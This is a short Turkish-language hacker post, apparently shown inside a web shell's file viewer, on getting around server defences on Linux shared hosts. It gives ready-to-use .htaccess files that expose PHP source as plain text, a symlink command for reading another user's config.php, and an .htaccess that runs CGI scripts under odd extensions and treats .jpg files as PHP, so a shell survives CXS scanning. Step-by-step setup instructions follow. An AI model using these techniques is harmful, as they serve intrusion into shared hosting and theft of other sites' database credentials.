Linux Server Disable Functions Bypass KriptoH rwxr-xr-x 0 17:04:00

Filename	Linux Server Disable Functions Bypass
Permission	rw-r--r--
Author	KriptoH
Date and Time	17:04:00
Label
Action

Selamün aleyküm arkadaslar bu yazımda Linux serverlerde CXS bypass ve Forbidden Not Found  videosu çektim

Forbidden .htaccess : 

Options all
ForceType text/plain
AddType text/plain .php
AddType text/plain .html
AddHandler server-parsed .php
AddHandler txt .php

Geliştirilmiş Forbidden .htaccess : 

OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
Options Indexes FollowSymLinks
ForceType text/plain
AddType text/plain .php 
AddType text/plain .html
AddType text/html .shtml
AddType txt .php
AddHandler server-parsed .php
AddHandler txt .php
AddHandler txt .html
AddHandler txt .shtml
Options All
Options All
ReadmeName deneme.txt

aynı mantık ile ln -s /home/user/public_html/config.php deneme.txt ekrana yansıtıyoruz. not : her serverde işe yaramaz her swnin kendi mantıka göre gecilme yöntemleri var. 

Bu yazıyla beraber şimdi CXS serverlerde Shell yememe sorunu Cgi yememe sorunuyla ilgili yazıyı yazayım bunun .htaccess bypass yontemi vardır ama her sunucuda calısmaz.

.htaccess : 
Options +FollowSymLinks +Indexes
DirectoryIndex default.html 
## START ##
Options +ExecCGI
AddHandler cgi-script log cgi pl tg love h4 tgb x-zone 
AddType application/x-httpd-php .jpg
RewriteEngine on
RewriteRule (.*)\war$ .log
## END ##

Oncelikle s4 adında klasör olusturun chmod 755 verin üst'e verdigim .htaccess server atın Cgi'nizi .log olarak kaydetin chmod 0755 verin. 

Fazla uzun tutmuycam yazıyı Selametle.